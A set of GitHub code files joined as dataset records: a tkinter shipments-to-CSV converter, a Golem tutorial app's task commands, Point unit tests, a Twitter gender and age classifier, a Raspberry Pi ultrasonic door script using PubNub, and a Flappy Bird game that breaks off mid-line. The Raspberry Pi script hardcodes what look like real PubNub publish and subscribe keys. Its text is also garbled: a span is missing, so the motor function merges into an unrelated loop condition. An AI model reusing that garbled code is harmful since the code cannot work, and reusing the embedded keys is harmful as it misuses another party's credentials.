self.entry_file.grid(row=0, column=1, sticky=\"ew\")\n\n # Just space\n self.row_0_space = tk.Label(self.frame_0, padx=1)\n self.row_0_space.grid(row=0, column=2)\n\n # Select file button\n self.entry_file_button = tk.Button(\n self.frame_0, text=\"...\", height=1,\n padx=10, command=self.__select_file)\n self.entry_file_button.grid(row=0, column=3)\n\n # Scanning frame\n self.frame = tk.Frame(self, pady=5)\n self.frame.grid(row=2, column=0, columnspan=4, sticky=\"we\")\n\n # Scan explanation label\n explanation = \"Presioná \\\"Escanear\\\" para buscar los\" + \\\n \" envíos en el archivo\"\n self.status_label = tk.Label(self.frame, text=explanation)\n self.status_label.pack()\n\n # Scann for Shipments' data button\n self.entry_file_button = tk.Button(\n self.frame, text=\"Escanear\", height=1, padx=10,\n command=self.__convert)\n self.entry_file_button.pack()\n\n # Scanning status label\n self.status_label = tk.Label(self.frame, text=\"En espera\")\n self.status_label.pack()\n\n # Export frame\n self.export_frame = tk.LabelFrame(\n self, text=\"Exportación\", pady=10, padx=10)\n self.export_frame.grid(row=3, column=0, columnspan=3)\n\n # Copy to clipboard\n self.copy_button = tk.Button(\n self.export_frame, text=\"Copiar\", padx=15,\n command=lambda: self.__copy_to_clipboard(self.result))\n self.copy_button.pack(side=tk.LEFT)\n\n # Export to CSV\n self.export_csv = tk.Button(\n self.export_frame, text='Exportar a CSV', padx=15,\n command=lambda: self.__export('csv'))\n self.export_csv.pack(side=tk.LEFT)\n\n # # Export to TXT\n self.export_txt = tk.Button(\n self.export_frame, text='Exportar a TXT', padx=15,\n command=lambda: self.__export('txt'))\n self.export_txt.pack(side=tk.LEFT)\n\n # Open export string as dialog\n self.export_dialog = tk.Button(\n self.export_frame, text='Ventana de diálogo', padx=15,\n command=self.__open_as_dialog)\n self.export_dialog.pack(side=tk.LEFT)\n\n # self.columnconfigure(1, weight=1)\n # self.columnconfigure(0, weight=1)\n\n self.__disable_buttons()\n return\n\n def __disable_buttons(self):\n self.all_buttons = [self.copy_button,\n self.export_csv,\n self.export_txt,\n self.export_dialog]\n for btn in self.all_buttons:\n btn['state'] = 'disabled'\n return\n\n def __enable_buttons(self):\n self.all_buttons = [self.copy_button,\n self.export_csv,\n self.export_txt,\n self.export_dialog]\n for btn in self.all_buttons:\n btn['state'] = 'normal'\n return\n\n def __select_file(self):\n \"\"\"Runs an Open File Dialog for PDF selecting\n \"\"\"\n try:\n downloads_path = str(Path.home() / \"Downloads\")\n self.filename = 
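# __disable_buttons and __enable_buttons above rebuild the same button list
# twice and differ only in the state string. A common tkinter collapse of the
# pair into one helper (sketch; needs a display to run):
import tkinter as tk

def set_buttons_state(buttons, state):
    for btn in buttons:
        btn['state'] = state      # 'normal' or 'disabled', as tkinter expects

root = tk.Tk()
demo = tk.Button(root, text='Exportar a CSV')
set_buttons_state([demo], 'disabled')
print(demo['state'])              # -> disabled
root.destroy()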
filedialog.askopenfilename(\n # initialdir=\"C:/\", title=\"Seleccioná un archivo PDF\",\n initialdir=downloads_path, title=\"Seleccioná un archivo PDF\",\n filetypes=((\"PDF, CSV, Excel\", \"*.*\"),)\n )\n if self.filename:\n self.entry_file.delete(0, 'end')\n self.entry_file.insert(0, self.filename)\n return\n except Exception as e:\n self.__disable_buttons()\n self.__popup(e)\n\n def __convert(self):\n \"\"\"Performs the conversion from file to a csv string\n representing the MercadoLibre's shipments.\n \"\"\"\n if len(self.entry_file.get()) > 0:\n try:\n self.__disable_buttons()\n self.__show_in_progress()\n extraction = self.extractor.get_shipments(\n self.entry_file.get())\n self.result, self.total_count = extraction\n self.file_scanned = True\n self.__show_success()\n self.__enable_buttons()\n\n except Exception as e:\n self.__show_error()\n return self.__popup(e)\n else:\n return self.__popup(\"Ningún archivo seleccionado para escanear.\")\n\n def __show_error(self):\n \"\"\"Displays an error message\n \"\"\"\n self.status_label.config(\n text='Error al obtener los datos', fg=\"#F00\")\n return\n\n def __show_in_progress(self):\n \"\"\"Displays File convertion in progress\n \"\"\"\n self.status_label.config(text='Procesando...', fg=\"#000\")\n return\n\n def __show_success(self):\n \"\"\"Displays File has been successfully converted.\n \"\"\"\n t = f'Éxito! {self.total_count} envíos encontrados!'\n self.status_label.config(text=t, fg=\"#008000\")\n return\n\n def __popup(self, message):\n \"\"\"Displays error popup with the message provided\n parsed to string.\n\n Args:\n message (Any)\n \"\"\"\n error_title = \"Ha ocurrido un error\"\n error_message = \"Error: \" + str(message)\n messagebox.showerror(error_title, error_message)\n return\n\n def __export(self, extension: str):\n \"\"\"Performs the export to a file in the provided extension with shipments\n formatted in CSV-style.\n Asks for filename and path to save to.\n\n Args:\n extension (str): file extension (csv, txt).\n\n Returns:\n A popup error if pdf hasn't been converted yet, or a\n popup error displaying the exception, or nothing\n if there wasn't any filepath to save to.\n \"\"\"\n if not self.file_scanned:\n return self.__popup(\"Todavía no se escaneó ningún PDF\")\n try:\n file = filedialog.asksaveasfile(\n mode='w', defaultextension=f'*.{extension}',\n filetypes=((extension.upper(), f'*.{extension}'),\n (\"Todos los archivos\", \"*.*\")))\n\n # asksaveasfile return `None` if dialog closed with \"cancel\".\n if file is None:\n return\n\n file.write(self.result)\n file.close()\n name = file.name\n last_slash_index = name.rfind('/')\n path = name[:last_slash_index]\n return self.__explore(path)\n except Exception as e:\n self.__popup(e)\n\n def __open_excel_instructions(self):\n path = os.path.abspath(os.getcwd())\n filename = path + \"\\\\excel_instructions.html\"\n return webbrowser.open('file://' + os.path.realpath(filename))\n\n def __open_txt_as_dialog(self, txt, big=None):\n \"\"\"Displays text in a new tkinter window.\n \"\"\"\n top = Toplevel()\n my_label = Text(top)\n my_label.insert(INSERT, txt)\n my_label.pack()\n if big:\n top.resizable(False, False)\n return top\n\n def __open_as_dialog(self):\n \"\"\"Displays all shipments parsed to full str in CSV-style\n in a new tkinter window.\n\n Returns:\n A popup error if pdf hasn't been converted yet\n \"\"\"\n if not self.file_scanned:\n return self.__popup(\"Todavía no se escaneó ningún PDF\")\n top = self.__open_txt_as_dialog(self.result)\n btn = Button(top, 
text=\"Copiar\",\n command=lambda: self.__copy_to_clipboard(\n self.result))\n btn.pack()\n return\n\n def __copy_to_clipboard(self, txt: str):\n \"\"\"Copies to clipboard displayed shipments parsed to full str\n in CSV-style displayed in new tkinter window.\n\n Args:\n txt (Str): Text to copy.\n \"\"\"\n self.clipboard_clear()\n self.clipboard_append(txt)\n # now it stays on the clipboard after the window is closed\n self.update()\n return\n\n def __explore(self, path: str):\n \"\"\"Opens File Explorer at provided path.\n\n Args:\n path (str): to open File Explorer to.\n \"\"\"\n # explorer would choke on forward slashes\n path = os.path.normpath(path)\n if os.path.isdir(path):\n subprocess.run([self.FILEBROWSER_PATH, path])\n elif os.path.isfile(path):\n subprocess.run(\n [self.FILEBROWSER_PATH, '/select,', os.path.normpath(path)])\n\n\ndef main():\n try:\n root = tk.Tk()\n root.geometry(\"580x330\")\n root.title(\"File2CSV\")\n root.resizable(False, False)\n path = os.path.abspath(os.getcwd())\n icon = path + \"\\\\file2csv.gif\"\n img = tk.PhotoImage(file=icon)\n root.tk.call('wm', 'iconphoto', root._w, img)\n app = Application(root)\n app.mainloop()\n except Exception as e:\n logpath = os.path.abspath(os.getcwd()) + \"\\\\log.txt\"\n with open(logpath, 'a') as txt:\n txt.write(str(e) + \"\\n\")\n return\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"EkoTunde/file2csv","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"71309836096","text":"import shutil\nimport uuid\nimport zipfile\n\nfrom pathlib import Path\nfrom typing import List, Optional, Tuple\n\nimport golem_task_api as api\nfrom golem_task_api.apputils.task import SubtaskStatus\nfrom golem_task_api.dirutils import RequestorTaskDir, ProviderTaskDir\nfrom golem_task_api.enums import VerifyResult\nfrom golem_task_api.envs import DOCKER_CPU_ENV_ID\nfrom golem_task_api.structs import Infrastructure, Task\n\nfrom . 
import proof_of_work\nfrom .task_manager import TaskManager, PREREQUISITES\n\n\ndef _read_zip_contents(path: Path) -> str:\n with zipfile.ZipFile(path, 'r') as file:\n input_file = file.namelist()[0]\n with file.open(input_file) as inner_file:\n return inner_file.read().decode('utf-8')\n\n\nasync def create_task(\n work_dir: RequestorTaskDir,\n max_part_count: int,\n task_params: dict,\n) -> Task:\n # validate the 'difficulty' parameter\n difficulty = int(task_params['difficulty'])\n if difficulty < 0:\n raise ValueError(f\"difficulty={difficulty}\")\n # check whether resources were provided\n resources = task_params.get('resources')\n if not resources:\n raise ValueError(f\"resources={resources}\")\n # read the input file\n try:\n task_input_file = work_dir.task_inputs_dir / resources[0]\n input_data = task_input_file.read_text('utf-8')\n except (IOError, StopIteration) as exc:\n raise ValueError(f\"Invalid resource file: {resources} ({exc})\")\n # create the task\n task_manager = TaskManager(work_dir)\n task_manager.create_task(max_part_count)\n # update the parts with input data\n for num in range(max_part_count):\n part = task_manager.get_part(num)\n part.input_data = input_data + str(uuid.uuid4())\n part.difficulty = difficulty + (difficulty % 2)\n part.save()\n\n return Task(\n env_id=DOCKER_CPU_ENV_ID,\n prerequisites=PREREQUISITES,\n inf_requirements=Infrastructure(min_memory_mib=50.))\n\n\nasync def abort_task(\n work_dir: RequestorTaskDir,\n) -> None:\n task_manager = TaskManager(work_dir)\n task_manager.abort_task()\n\n\nasync def abort_subtask(\n work_dir: RequestorTaskDir,\n subtask_id: str\n) -> None:\n task_manager = TaskManager(work_dir)\n task_manager.update_subtask_status(subtask_id, SubtaskStatus.ABORTED)\n\n\nasync def next_subtask(\n work_dir: RequestorTaskDir,\n subtask_id: str,\n) -> Optional[api.structs.Subtask]:\n task_manager = TaskManager(work_dir)\n\n part_num = task_manager.get_next_computable_part_num()\n if part_num is None:\n return None\n part = task_manager.get_part(part_num)\n\n # write subtask input file\n subtask_input_file = work_dir.subtask_inputs_dir / f'{subtask_id}.zip'\n with zipfile.ZipFile(subtask_input_file, 'w') as file:\n file.writestr(subtask_id, part.input_data)\n\n resources = [subtask_input_file.name]\n task_manager.start_subtask(part_num, subtask_id)\n\n return api.structs.Subtask(\n params={\n 'difficulty': part.difficulty,\n 'resources': resources,\n },\n resources=resources,\n )\n\n\nasync def verify_subtask(\n work_dir: RequestorTaskDir,\n subtask_id: str,\n) -> Tuple[VerifyResult, Optional[str]]:\n\n subtask_outputs_dir = work_dir.subtask_outputs_dir(subtask_id)\n output_data = _read_zip_contents(subtask_outputs_dir / f'{subtask_id}.zip')\n\n provider_result, provider_nonce_str = output_data.rsplit(' ', maxsplit=1)\n provider_nonce = int(provider_nonce_str)\n\n # verify hash\n task_manager = TaskManager(work_dir)\n task_manager.update_subtask_status(subtask_id, SubtaskStatus.VERIFYING)\n\n try:\n part_num = task_manager.get_part_num(subtask_id)\n part = task_manager.get_part(part_num)\n\n proof_of_work.verify(\n part.input_data,\n difficulty=part.difficulty,\n against_result=provider_result,\n against_nonce=provider_nonce)\n\n shutil.copy(\n subtask_outputs_dir / f'{subtask_id}.zip',\n work_dir.task_outputs_dir / f'{subtask_id}.zip')\n except (AttributeError, ValueError) as err:\n task_manager.update_subtask_status(subtask_id, SubtaskStatus.FAILURE)\n return VerifyResult.FAILURE, str(err)\n\n 
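# commands.py treats proof_of_work.compute/verify as a black box with the
# call shapes used here. A minimal sketch of what such a pair typically looks
# like (an assumption about the internals only; the real tutorialapp module
# may differ): find a nonce whose sha256(input + nonce) has `difficulty`
# leading zero bits.
import hashlib

def compute(input_data: str, difficulty: int):
    nonce = 0
    while True:
        digest = hashlib.sha256(f'{input_data}{nonce}'.encode()).hexdigest()
        if int(digest, 16) >> (256 - difficulty) == 0:
            return digest, nonce
        nonce += 1

def verify(input_data, difficulty, against_result, against_nonce):
    digest = hashlib.sha256(f'{input_data}{against_nonce}'.encode()).hexdigest()
    if digest != against_result or int(digest, 16) >> (256 - difficulty):
        raise ValueError('invalid proof of work')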
task_manager.update_subtask_status(subtask_id, SubtaskStatus.SUCCESS)\n return VerifyResult.SUCCESS, None\n\n\nasync def discard_subtasks(\n work_dir: RequestorTaskDir,\n subtask_ids: List[str],\n) -> List[str]:\n task_manager = TaskManager(work_dir)\n for subtask_id in subtask_ids:\n task_manager.update_subtask_status(subtask_id, SubtaskStatus.ABORTED)\n return subtask_ids\n\n\nasync def has_pending_subtasks(\n work_dir: RequestorTaskDir,\n) -> bool:\n task_manager = TaskManager(work_dir)\n return task_manager.get_next_computable_part_num() is not None\n\n\nasync def run_benchmark() -> float:\n return await api.threading.Executor.run(proof_of_work.benchmark)\n\n\nasync def compute_subtask(\n work_dir: ProviderTaskDir,\n subtask_id: str,\n subtask_params: dict,\n) -> Path:\n # validate params\n resources = subtask_params['resources']\n if not resources:\n raise ValueError(f\"resources={resources}\")\n difficulty = int(subtask_params['difficulty'])\n if difficulty < 0:\n raise ValueError(f\"difficulty={difficulty}\")\n\n # read input data\n subtask_input_file = work_dir.subtask_inputs_dir / resources[0]\n subtask_input = _read_zip_contents(subtask_input_file)\n\n # execute computation\n hash_result, nonce = await api.threading.Executor.run(\n proof_of_work.compute,\n input_data=subtask_input,\n difficulty=difficulty)\n\n # bundle computation output\n subtask_output_file = work_dir / f'{subtask_id}.zip'\n with zipfile.ZipFile(subtask_output_file, 'w') as file:\n file.writestr(subtask_id, f'{hash_result} {nonce}')\n\n return subtask_output_file.name\n","repo_name":"golemfactory/tutorialapp","sub_path":"image/tutorial_app/tutorial_app/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":5947,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"37130292814","text":"import unittest\nimport random\nfrom util_import import set_imports\nset_imports()\nfrom point import Point\n\n\nclass PointTests(unittest.TestCase):\n \n def test_dataAccess(self):\n x = random.randint(-2e6, 2e6)\n y = random.randint(-2e6, 2e6)\n point = Point(x, y)\n self.assertEqual(point.x, x)\n self.assertEqual(point.y, y)\n\n def test_equivalence(self):\n x = random.randint(-2e6, 2e6)\n y = random.randint(-2e6, 2e6)\n pointA = Point(x, y)\n pointB = Point(x, y)\n pointC = Point(x + 1, y)\n pointD = Point(x, y + 1)\n self.assertEqual(pointA, pointB)\n self.assertNotEqual(pointA, pointC)\n self.assertNotEqual(pointA, pointD)\n self.assertNotEqual(pointD, pointC)\n\nif __name__==\"__main__\":\n unittest.main()","repo_name":"reizy/spacerace-clients","sub_path":"python/tests/tests_point.py","file_name":"tests_point.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"28962815284","text":"import json\nimport re\nimport pandas as pd\n\nclass TaskManager:\n \"\"\"\n Utility class for defining labels and reading data tables (.csv, .tsv, ...) 
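# A portability note on the Point tests above: random.randint(-2e6, 2e6) is
# called with float arguments, which random.randrange deprecated in Python
# 3.10 and newer releases reject, so explicit ints are safer:
import random

x = random.randint(-2_000_000, 2_000_000)
print(-2_000_000 <= x <= 2_000_000)  # -> True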
and returning the input texts and gold labels\n \"\"\"\n\n def __init__(self, task_file, logdir=None):\n\n # define dictionary of data-reading functions\n self.data_reading_functions = {\n \"twitter_features_gender_bio\": TaskManager.twitter_features_gender_bio,\n \"twitter_features_gender_bio_tweets\": TaskManager.twitter_features_gender_bio_tweets,\n \"twitter_features_age_bio\": TaskManager.twitter_features_age_bio,\n \"twitter_features_age_bio_tweets\": TaskManager.twitter_features_age_bio_tweets,\n \"twitter_features_age_interval_bio\": TaskManager.twitter_features_age_interval_bio,\n \"twitter_features_age_interval_bio_tweets\": TaskManager.twitter_features_age_interval_bio_tweets,\n \"twitter_features_extra_nogold\": TaskManager.twitter_features_extra_nogold,\n }\n\n # read task specs from json task_file\n self.task = json.load(open(task_file, 'r'))\n # setup labels\n self.labels = self.task['labels']\n self.label_dims = self.task['label_dims'] if 'label_dims' in self.task else 1\n self.default_label = list(self.labels.keys())[0] if self.label_dims == 1 else list(self.labels['dim1'].keys())[0]\n # setup data reading function\n if self.task['read_function'] in self.data_reading_functions:\n self.read_data = self.data_reading_functions[self.task['read_function']]\n else:\n raise ValueError(\n f\"Data-reading function '{self.task['read_function']}' not supported.\"\n f\"Supported functions: {self.data_reading_functions.keys()}\"\n )\n\n @staticmethod\n def twitter_features(\n path_data: str,\n include_bio=True,\n include_tweets=True,\n label_name='is_male',\n ):\n # Read the pickle dataframe\n if path_data.endswith('.pkl'):\n df = pd.read_pickle(path_data)\n else:\n raise NotImplementedError\n # Set the index to the user_id\n df.set_index('user_id', inplace=True)\n # check if there are any missing values (shouldn't be the case)\n if df.isnull().values.any():\n raise ValueError('The dataframe contains missing values')\n # Read each bio and tweets concatenation, splitting them by \\n and\n # joining by '. ' if sentences don't already end with a dot, else join by ' '\n if include_bio:\n df.masked_bio = df.masked_bio.apply(lambda x: [text + '.' if not (text.endswith('.') or text.endswith('!') or text.endswith('?') or text.endswith(';')) else text for text in x.split('\\n')]).apply(lambda x: ' '.join(x)).apply(lambda x: re.sub('\\r', '', x)).tolist()\n if include_tweets:\n df.long_text = df.long_text.apply(lambda x: [text + '.' 
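# The chained .apply(lambda ...) pipelines above and below are hard to read.
# The same normalization as a named helper (a readability sketch, not the
# project's API): split on newlines, terminate each piece with punctuation,
# join with spaces, strip carriage returns.
import re

def join_sentences(block: str) -> str:
    parts = [p if p.endswith(('.', '!', '?', ';')) else p + '.'
             for p in block.split('\n')]
    return re.sub('\r', '', ' '.join(parts))

print(join_sentences('loves coffee\nworks at night!'))
# -> 'loves coffee. works at night!'; usable as df.masked_bio.apply(join_sentences)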
if not (text.endswith('.') or text.endswith('!') or text.endswith('?') or text.endswith(';')) else text for text in x.split('\\n')]).apply(lambda x: ' '.join(x)).apply(lambda x: re.sub('\\r', '', x)).tolist()\n if include_bio and include_tweets:\n # Join each tweet and bio by 'Bio: ' and 'Tweets: '\n input_texts = df.apply(lambda x: 'Bio: ' + x.masked_bio + '\\nTweets: ' + x.long_text, axis=1)\n elif include_bio:\n input_texts = df.apply(lambda x: 'Bio: ' + x.masked_bio, axis=1)\n elif include_tweets:\n input_texts = df.apply(lambda x: 'Tweets: ' + x.long_text, axis=1)\n\n # Read the gold labels\n if label_name == 'is_male':\n gold_labels = df[[label_name]]\n gold_labels[label_name] = gold_labels[label_name].apply(lambda x: 'male' if x==True else 'female')\n if label_name == 'age':\n gold_labels = df[[label_name]]\n gold_labels[label_name] = gold_labels[label_name].astype('int')\n if label_name == 'age_interval':\n # define age classes\n age_intervals = [0, 19, 30, 40, 100]\n age_labels = [0, 1, 2, 3]\n # Discretize the 'age' column into four classes\n gold_labels = pd.cut(df['age'], bins=age_intervals, labels=age_labels, right=False).astype('str')\n \n return input_texts, gold_labels\n\n @staticmethod\n def twitter_features_extra_nogold(\n path_data: str,\n ):\n\n # Read the pickle dataframe\n if path_data.endswith('.pkl'):\n df = pd.read_pickle(path_data)\n else:\n raise NotImplementedError\n\n # Set the index to the user_id\n df.set_index('user_id', inplace=True)\n # create input text\n # Separating text and numbers with a space\n df['username_sep'] = df['username'].str.replace(r'([a-zA-Z])(\\d)', r'\\1 \\2').\\\n str.replace(r'(\\d)([a-zA-Z])', r'\\1 \\2')\n # concat info\n df['input_texts'] = 'NAME:' + ' \"' + df['full_name'] + '\". ' +\\\n 'USERNAME:' + ' \"'+ df['username_sep'] + '\". ' + \\\n 'JOINED:' + ' \"' + df['join_year'].astype(str) + '\". ' +\\\n 'TWEETS:' + ' \"' + df['tweets'].astype(str) + '\". ' + \\\n 'FOLLOWING:' + ' \"' + df['following'].astype(str) + '\". ' +\\\n 'FOLLOWERS:' + ' \"' + df['followers'].astype(str) + '\". ' + \\\n 'BIO:' + ' \"' + df['bio'] + '\". 
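# A quick self-contained check of the pd.cut binning above: right=False makes
# the four age classes [0,19), [19,30), [30,40) and [40,100).
import pandas as pd

ages = pd.Series([15, 19, 29, 35, 64], name='age')
print(pd.cut(ages, bins=[0, 19, 30, 40, 100],
             labels=[0, 1, 2, 3], right=False).tolist())
# -> [0, 1, 1, 2, 3]: 19 already falls in the second interval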
' + \\\n 'TEXT:' + ' \"' + df['long_text'] + '\".'\n\n # check if there are any missing values in input texts (shouldn't be the case)\n if df.input_texts.isnull().values.any():\n raise ValueError('The dataframe contains missing input_texts')\n\n return df['input_texts'], None\n\n @staticmethod\n def twitter_features_gender_bio(path):\n return TaskManager.twitter_features(path, include_bio=True, include_tweets=False, label_name='is_male')\n\n @staticmethod\n def twitter_features_gender_bio_tweets(path):\n return TaskManager.twitter_features(path, include_bio=True, include_tweets=True, label_name='is_male')\n\n @staticmethod\n def twitter_features_age_bio(path):\n return TaskManager.twitter_features(path, include_bio=True, include_tweets=False, label_name='age')\n\n @staticmethod\n def twitter_features_age_bio_tweets(path):\n return TaskManager.twitter_features(path, include_bio=True, include_tweets=True, label_name='age')\n\n @staticmethod\n def twitter_features_age_interval_bio(path):\n return TaskManager.twitter_features(path, include_bio=True, include_tweets=False, label_name='age_interval')\n\n @staticmethod\n def twitter_features_age_interval_bio_tweets(path):\n return TaskManager.twitter_features(path, include_bio=True, include_tweets=True, label_name='age_interval')\n","repo_name":"lorelupo/twitter_user_classification","sub_path":"task_manager.py","file_name":"task_manager.py","file_ext":"py","file_size_in_byte":6900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"21397026028","text":"#!/usr/bin/env python3\n########################################################################\n# Filename : UltrasonicRanging.py\n# Description : Get distance via UltrasonicRanging sensor\n# Author : www.freenove.com\n# modification: 2019/12/28\n########################################################################\nimport RPi.GPIO as GPIO\nimport time\nimport requests\nfrom pubnub.pubnub import PubNub, SubscribeListener, SubscribeCallback, PNStatusCategory \nfrom pubnub.pnconfiguration import PNConfiguration \nfrom pubnub.exceptions import PubNubException\nimport pubnub \nimport numpy as np\n\ntrigPin = 16\nechoPin = 18\nMAX_DISTANCE = 220 # define the maximum measuring distance, unit: cm\ntimeOut = MAX_DISTANCE*60 # calculate timeout according to the maximum measuring distance\n\nmotorPins = (7, 11, 13, 15) # define pins connected to four phase ABCD of stepper motor\nCCWStep = (0x01,0x02,0x04,0x08) # define power supply order for rotating anticlockwise \nCWStep = (0x08,0x04,0x02,0x01) # define power supply order for rotating clockwise\n\ndef Whoishere(name,count):\n pnconf = PNConfiguration() \n pnconf.publish_key = 'pub-c-09e8cb71-5f5f-4f9d-9826-8ac234ced3b5' \n pnconf.subscribe_key = 'sub-c-0f975440-22ff-11ec-880d-a65b09ab59bc' \n pnconf.uuid='CPS14'\n pubnub = PubNub(pnconf) \n \n channel='CPS14'\n data = {\n 'message': '{} is here. Opening the door. 
Total number of People inside are {} '.format(name,count) \n }\n my_listener = SubscribeListener() \n pubnub.add_listener(my_listener) \n pubnub.subscribe().channels(channel).execute() \n my_listener.wait_for_connect() \n print('connected') \n pubnub.publish().channel(channel).message(data).sync() \n result = my_listener.wait_for_message_on(channel) \n print(result.message)\n moveSteps(1,3,512) # rotating 360 deg clockwise, a total of 2048 steps in a circle, 512 cycles\n time.sleep(5)\n moveSteps(0,3,512) # rotating 360 deg anticlockwise\n\ndef pulseIn(pin,level,timeOut): # obtain pulse time of a pin under timeOut\n t0 = time.time()\n while(GPIO.input(pin) != level):\n if((time.time() - t0) > timeOut*0.000001):\n return 0;\n t0 = time.time()\n while(GPIO.input(pin) == level):\n if((time.time() - t0) > timeOut*0.000001):\n return 0;\n pulseTime = (time.time() - t0)*1000000\n return pulseTime\n \ndef getSonar(): # get the measurement results of ultrasonic module,with unit: cm\n GPIO.output(trigPin,GPIO.HIGH) # make trigPin output 10us HIGH level \n time.sleep(0.00001) # 10us\n GPIO.output(trigPin,GPIO.LOW) # make trigPin output LOW level \n pingTime = pulseIn(echoPin,GPIO.HIGH,timeOut) # read plus time of echoPin\n distance = pingTime * 340.0 / 2.0 / 10000.0 # calculate distance with sound speed 340m/s \n return distance\n \ndef setup():\n GPIO.setmode(GPIO.BOARD) # use PHYSICAL GPIO Numbering\n GPIO.setup(trigPin, GPIO.OUT) # set trigPin to OUTPUT mode\n GPIO.setup(echoPin, GPIO.IN) # set echoPin to INPUT mode\n GPIO.setmode(GPIO.BOARD) # use PHYSICAL GPIO Numbering\n for pin in motorPins:\n GPIO.setup(pin,GPIO.OUT)\n\ndef moveOnePeriod(direction,ms): \n for j in range(0,4,1): # cycle for power supply order\n for i in range(0,4,1): # assign to each pin\n if (direction == 1):# power supply order clockwise\n GPIO.output(motorPins[i],((CCWStep[j] == 1<1.5 and distance <= 5:\n URL=\"http://127.0.0.1:5050/url\"\n r=requests.get(url=URL)\n data=r.json()\n if 'result' in data:\n print(data)\n if data['result']=='nothing found':\n continue\n else:\n if data['preds'] in name:\n name.remove(data['preds'])\n count=count-1\n Whoishere(data['preds'],count) \n else:\n name.append(data['preds'])\n count=count+1\n Whoishere(data['preds'],count)\n \n \n print(data)\n print(count)\n \n \n \n \nif __name__ == '__main__': # Program entrance\n print ('Program is starting...')\n setup()\n try:\n loop()\n except KeyboardInterrupt: # Press ctrl-c to end the program.\n GPIO.cleanup() # release GPIO resource\n\n\n","repo_name":"TITHI007/Smart-Clock-In-System","sub_path":"FinalCode.py","file_name":"FinalCode.py","file_ext":"py","file_size_in_byte":5548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"34891852191","text":"# ------------------------------------ Flappy Bird Game ------------------------------------- #\nimport random # For generating random number\nimport sys # We will use sys.exit to exit the Program\nimport pygame # Pygame for Creating Game using Python\nfrom pygame.locals import * # Basic pygame imports\n\n\n# ------------------------- Global Variables For Game --------------------- #\n\nFPS = 32 # Frames per Second For Rendering images\nSCREEN_WIDTH = 289 # Width of Screen\nSCREEN_HEIGHT = 511 # Height of Screen\nSCREEN = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT)) # Initialize a window or screen for display\nGROUND_Y = (SCREEN_HEIGHT * 0.3) + 34 # For our Base image\nGAME_SPRITES = {} # For all kind of images\nGAME_SOUNDS = {} 
# For all kind of Sounds\nPLAYER = 'gallery/Sprites/bird.png' # path of Bird image\nBACKGROUND = 'gallery/Sprites/Background.png' # path of Background image\nPIPE = 'gallery/Sprites/Pipe.png' # path of Pipe image\n\n# ------------------------------------------------------------------ #\n\n# --------------------------------- Functions -------------------------- #\n\n\n# ---------------------- Function For Welcome Screen ------------------- #\ndef welcomeScreen():\n \"\"\"\n Shows welcome images on the Screen\n \"\"\"\n player_x = int(SCREEN_WIDTH - 300) # For Bird x Position\n player_y = int((SCREEN_HEIGHT - GAME_SPRITES['player'].get_height() + 25)/2) # For Bird y position\n\n message_x = int(SCREEN_WIDTH - GAME_SPRITES['message'].get_width()) # For message x Position\n message_y = int(SCREEN_HEIGHT - 530) # For message y position\n\n base_x = 0\n\n while True:\n for event in pygame.event.get(): # get events from the queue\n # if user clicks on the cross button, close the game\n if event.type == QUIT or (event.type == KEYDOWN and event.key == K_ESCAPE): # KEYDOWN == any key press\n pygame.quit()\n sys.exit()\n\n # if user presses the space or up key start the game for them\n elif event.type == KEYDOWN and (event.key == K_SPACE or event.key == K_UP):\n return\n else:\n # .blit(image for blit, x and y position )\n SCREEN.blit(GAME_SPRITES['background'], (0, 0)) # Screen is a surface where all images will be blit\n SCREEN.blit(GAME_SPRITES['player'], (player_x, player_y))\n SCREEN.blit(GAME_SPRITES['message'], (message_x, message_y))\n SCREEN.blit(GAME_SPRITES['base'], (base_x, GROUND_Y))\n\n pygame.display.update() # Update portions of the screen for software displays\n FPS_CLOCK.tick(FPS) # To control fps of the game.\n# ----------------------------------------------------------------------------------------------------------- #\n\n\n# ---------------------------------------- Function for Main Game ---------------------------------- #\n
def mainGame():\n \"\"\"\n This is the main function, runs after welcome screen\n \"\"\"\n score = 0 # Score variable for storing player score in game\n player_x = int(SCREEN_WIDTH - 300) # For Bird x Position\n player_y = int((SCREEN_HEIGHT - GAME_SPRITES['player'].get_height() + 25)/2) # For Bird y position\n base_x = 0 # For base image x position\n\n # Create two pipes for blitting on the screen\n new_pipe1 = getRandomPipe()\n new_pipe2 = getRandomPipe()\n\n # my list for upper pipe\n upper_pipe = [\n {'x': SCREEN_WIDTH + 200, 'y': new_pipe1[0]['y']},\n {'x': SCREEN_WIDTH + 200 + (SCREEN_WIDTH/2), 'y': new_pipe2[0]['y']}\n ]\n\n # my list for lower pipe\n lower_pipe = [\n {'x': SCREEN_WIDTH + 200, 'y': new_pipe1[1]['y']},\n {'x': SCREEN_WIDTH + 200 + (SCREEN_WIDTH/2), 'y': new_pipe2[1]['y']}\n ]\n\n pipe_velocity_x = -4 # Moving speed of pipes x toward left <-----\n\n player_velocity_y = -9 # speed of player falling down (y position)\n player_max_velocity_y = 10\n player_min_velocity_y = -8\n player_acceleration_y = 1\n\n player_flapped_velocity = -8 # velocity while flap\n player_flapped = False # it is True when bird is flapping\n\n # Game Loop\n while True:\n for event in pygame.event.get(): # get events from the queue\n # if user clicks on the cross button, close the game\n if event.type == QUIT or (event.type == KEYDOWN and event.key == K_ESCAPE): # KEYDOWN == any key press\n pygame.quit()\n sys.exit()\n if event.type == KEYDOWN and (event.key == K_SPACE or event.key == K_UP):\n if player_y > 0:\n player_velocity_y = player_flapped_velocity\n player_flapped = True\n GAME_SOUNDS['wing'].play()\n\n # Storing isCollide result in the crash_test variable\n crash_test = isCollide(player_x, player_y, upper_pipe, lower_pipe)\n if crash_test:\n return\n\n # Check for score\n player_mid_position = player_x + GAME_SPRITES['player'].get_width()/2 # center position of player\n\n for pipe in upper_pipe:\n pipe_mid_position = pipe['x'] + GAME_SPRITES['pipe'][0].get_width()/2 # center position of pipe\n if pipe_mid_position <= 